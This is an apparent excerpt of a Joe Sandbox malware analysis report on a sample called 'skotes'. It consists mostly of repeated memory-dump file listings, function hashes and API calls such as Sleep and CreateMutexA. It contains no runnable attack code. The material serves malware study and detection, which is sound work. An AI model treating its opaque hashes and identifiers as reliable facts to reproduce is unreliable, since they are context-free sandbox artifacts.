Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5cbb820eaca4c949571a6c9969c2b48e687a4a2d7094a516678e39c4082cc8be
Instruction ID: a1fb870b7e30a26fb1d8b872a8b491983c4ce8b4b4dbb4f2e300e80c8350e452
Opcode Fuzzy Hash: 5cbb820eaca4c949571a6c9969c2b48e687a4a2d7094a516678e39c4082cc8be
Instruction Fuzzy Hash: FC3139B1604208ABEB08DB78DC85B7CB762EBC5314F248218E558DB3D6D77D99908753

Function 007FA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: dbd82805b0399be2d3165e9baa21f9eec1622aac0e0b5228d9d8ddd31d06fc23
Instruction ID: f84ad1d378946dc1e5528f7c43bf2f077503b267cd894923aa170e1de02ffabe
Opcode Fuzzy Hash: dbd82805b0399be2d3165e9baa21f9eec1622aac0e0b5228d9d8ddd31d06fc23
Instruction Fuzzy Hash: CA3128B1604208ABEB18EB78DC85B7DB772EBC5311F248218E658D73D2D77D59808763

Function 007F9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 77e833749c5f3af3ccecb62f5fe71407e0536b3a7c32a6057216cf72daf7a395
Instruction ID: 2a885a209b598aacc3dc0d1712733d0f87e550284d3efcaf2ac106477983bf5d
Opcode Fuzzy Hash: 77e833749c5f3af3ccecb62f5fe71407e0536b3a7c32a6057216cf72daf7a395
Instruction Fuzzy Hash: 99213771604604ABEB189B6CEC8577CB772EBC1311F204229E658C77D6EBBE69808652

Function 007FA856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 73e1ea6c30689c022d1934758d74435d44fe67681d8515499d96b5142bb05a5d
Instruction ID: 6d694440708d59ad9b76f2e52c2fbf9854dbf6cd64d88a67f09123c5a45e042b
Opcode Fuzzy Hash: 73e1ea6c30689c022d1934758d74435d44fe67681d8515499d96b5142bb05a5d
Instruction Fuzzy Hash: AC214DB0345209E6F72967A8CC8A73D7222EF91700F600415E34CD73D2DABD55809193

Function 007FA34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 007FA963
CreateMutexA.KERNELBASE(00000000,00000000,00853254), ref: 007FA981

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873914727.0000000000A19000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873933730.0000000000A1A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873951041.0000000000A1B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873967479.0000000000A1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873988739.0000000000A24000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874010902.0000000000A2E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874036027.0000000000A54000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874052498.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874068703.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874088061.0000000000A5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874108218.0000000000A5D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874126370.0000000000A64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874142727.0000000000A65000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874159841.0000000000A6A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874177423.0000000000A71000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874202708.0000000000A74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874221065.0000000000A7C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874238807.0000000000A81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874255412.0000000000A88000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874271980.0000000000A8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874289352.0000000000A93000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874305792.0000000000A95000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874326138.0000000000AA5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874343234.0000000000AD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874393364.0000000000B00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874411678.0000000000B01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874427915.0000000000B02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874445809.0000000000B09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874463427.0000000000B17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1874479484.0000000000B19000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7f0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 47ff8d77bba564d2ee5f4c1c1dda5e1603805f4397e6dc951ff81616faee9e50
Instruction ID: 0a964a77ee2037b53acd6e00befde75b8c5c791665726d7de5c4ec231b42dcfe
Opcode Fuzzy Hash: 47ff8d77bba564d2ee5f4c1c1dda5e1603805f4397e6dc951ff81616faee9e50
Instruction Fuzzy Hash: 122125B1604708ABEB18DB6CDC8577CB762EFD1312F244229E618D77D1D77E65808252

Non-executed Functions

Function 0082CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0082CC66

Memory Dump Source

Source File: 00000002.00000002.1873417198.00000000007F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 007F0000, based on PE: true

Associated: 00000002.00000002.1873400634.00000000007F0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873417198.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873483948.0000000000859000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873505010.000000000085B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873525420.0000000000867000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873639358.00000000009C9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873657038.00000000009CC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873678925.00000000009E8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873719330.00000000009EA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873738206.00000000009EB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873757897.00000000009EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873777719.00000000009EF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873795366.00000000009F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873811521.00000000009F1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873832926.00000000009FC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873855205.0000000000A01000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873872768.0000000000A02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1873889895.0000000000A03000.00000040.00000001.01000000.00000007.sdmpDownload File
